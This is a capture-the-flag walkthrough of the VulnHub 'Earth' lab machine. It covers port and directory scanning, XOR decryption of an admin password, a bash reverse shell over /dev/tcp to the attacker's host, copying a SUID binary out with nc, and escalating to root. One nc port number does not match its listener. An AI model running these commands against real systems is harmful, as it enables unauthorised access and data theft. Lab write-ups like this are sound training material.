I. Target machine introduction
Download address
https://www.vulnhub.com/entry/the-planets-earth,755/#download
Description
Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com, though it may take a while for me to get back to you.
II. Solution steps
1. Determine the IP address
netdiscover -r 192.168.133.0/24
Target address obtained: 192.168.133.130
2. Scan the target's ports
nmap -A -sS -sC -p- 192.168.133.130
Note the two DNS names: earth.local and terratest.earth.local
3. Scan the web directories
Add the two hostnames above to the local hosts file, then scan the web directories over http and https separately
dirb http://terratest.earth.local
dirb https://terratest.earth.local
dirb http://earth.local
dirb https://earth.local
The main results are:
http://terratest.earth.local/admin (CODE:301|SIZE:0)
https://terratest.earth.local/index.html (CODE:200|SIZE:26)
https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)
4. Find the FLAG
First visit https://terratest.earth.local/robots.txt
The last entry should be a file specific to this box; guessing a .txt suffix and visiting https://terratest.earth.local/testingnotes.txt shows the following content:
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.
The Todo section can be ignored; the lines above it tell us the following:
XOR is used as the encryption method
https://terratest.earth.local/testdata.txt contains the key
The username for the admin page http://terratest.earth.local/admin is terra
At this point the idea is that these pieces of information should let us find the password of the terra account for the admin page and then log in.
Open the http://earth.local home page; there is a message-sending page:
Under "previous messages" there are 3 messages, which should be earlier messages encrypted with the key (the messages above them can be ignored; they were produced when I clicked send message while testing, and the original box only has the last 3).
Because XOR encryption is used, we can recover the content from before encryption using the key in testdata.txt. Python script (messageKey is the content of testdata.txt converted to hex):
sendMessage = "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"
messageKey = "4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973746f72792c206c69666520617070656172656420696e20746865206f6365616e7320616e6420626567616e20746f2061666665637420456172746827732061746d6f73706865726520616e6420737572666163652c206c656164696e6720746f207468652070726f6c696665726174696f6e206f6620616e6165726f62696320616e642c206c617465722c206165726f626963206f7267616e69736d732e20536f6d652067656f6c6f676963616c2065766964656e636520696e646963617465732074686174206c696665206d617920686176652061726973656e206173206561726c7920617320342e312062696c6c696f6e2079656172732061676f2e4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973746f72792c206c69666520617070656172656420696e20746865206f6365616e7320616e6420626567616e20746f2061666665637420456172746827732061746d6f73706865726520616e6420737572666163652c206c656164696e6720746f207468652070726f6c696665726174696f6e206f6620616e6165726f62696320616e642c206c617465722c206165726f626963206f7267616e69736d732e20536f6d652067656f6c6f676963616c2065766964656e636520696e646963617465732074686174206c696665206d617920686176652061726973656e206173206561726c7920617320342e312062696c6c696f6e2079656172732061676f2e"
c = ""
# Walk both hex strings one byte (two hex characters) at a time and XOR the
# ciphertext byte with the key byte at the same position, stopping at the
# shorter of the two strings instead of a hard-coded length
for i in range(0, min(len(sendMessage), len(messageKey)) - 1, 2):
    c += chr(int(sendMessage[i:i + 2], 16) ^ int(messageKey[i:i + 2], 16))
print(c)
The content from before encryption is shown below; the later part contains a repeated fragment: earthclimatechangebad4humans
Log in at http://terratest.earth.local/admin; the login succeeds and leads to a page that can execute system commands
Use this page to get a reverse shell first
Listen on local port 7777: nc -nvlp 7777
Execute the reverse shell command on the admin page: bash -i >& /dev/tcp/3232269696/7777 0>&1
(the 3232269696 in the middle is the local IP converted to decimal)
Local port 7777 receives the target's bash:
Fuzzy search for the flag: find / -name '*flag*'
First flag found: /var/earth_web/user_flag.txt
According to the box description, the second flag requires root privileges
Look for files with the SUID bit set: find / -perm -u=s
One named reset_root looks promising; try running it: /usr/bin/reset_root
It prints RESET FAILED; next, debug the file locally to see why it fails.
Listen on another local port to save the reset_root file: nc -nvlp 7778 > ~/Desktop/reset_root
On the target, send the contents of the reset_root file to the local port 7778: nc 192.168.133.128 9999 < /usr/bin/reset_root
With reset_root now obtained locally, run it under strace: strace ~/Desktop/reset_root. It shows that three files do not exist, causing the system calls to return -1; checking on the target confirms that these three files are indeed missing.
Create the three files on the target and run reset_root again. It reports that the root user's password has been reset to Earth
With root privileges the rest is simple. Log in to the target and fuzzy search again: find / -name '*flag*'
Second flag found!
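Why the scheme falls apart, as an added example that is not part of the original write-up: when a message is XORed with a repeating key, anyone holding a known plaintext (here, testdata.txt) gets the key stream back byte for byte, and because the key repeats, its length and value follow directly, which is the mechanism behind the repeated fragment seen above. The sample plaintext and key below are constructed, not values from the box.

```python
from itertools import cycle


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key as often as needed.

    This is the whole 'secure messaging' scheme the testing notes describe;
    applying it twice with the same key returns the original data.
    """
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext recovery: C XOR P yields the key stream byte for byte.

    XORing a captured message with testdata.txt is exactly this step, which
    is why the password shows up repeated in the decrypted output.
    """
    n = min(len(ciphertext), len(known_plaintext))
    return bytes(c ^ p for c, p in zip(ciphertext[:n], known_plaintext[:n]))


def key_period(keystream: bytes) -> int:
    """Smallest shift p at which the recovered key stream repeats itself."""
    for p in range(1, len(keystream)):
        if all(keystream[i] == keystream[i + p] for i in range(len(keystream) - p)):
            return p
    return len(keystream)


def recover_key(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """One period of the recovered key stream is the reused key itself."""
    stream = recover_keystream(ciphertext, known_plaintext)
    return stream[:key_period(stream)]


# Constructed sample data (hypothetical, not the values from the box): a known
# plaintext and a short key that is reused across the whole message.
SAMPLE_PLAINTEXT = b"The quick brown fox jumps over the lazy dog, again and again."
SAMPLE_KEY = b"s3cretk3y!"  # hypothetical key, 10 bytes
SAMPLE_CIPHERTEXT = xor_with_key(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    print(recover_keystream(SAMPLE_CIPHERTEXT, SAMPLE_PLAINTEXT))
    print(recover_key(SAMPLE_CIPHERTEXT, SAMPLE_PLAINTEXT))
```

The same properties are what make the "safe as used in RSA" note in testingnotes.txt wrong: a reused XOR key is only as secret as any one plaintext ever encrypted under it.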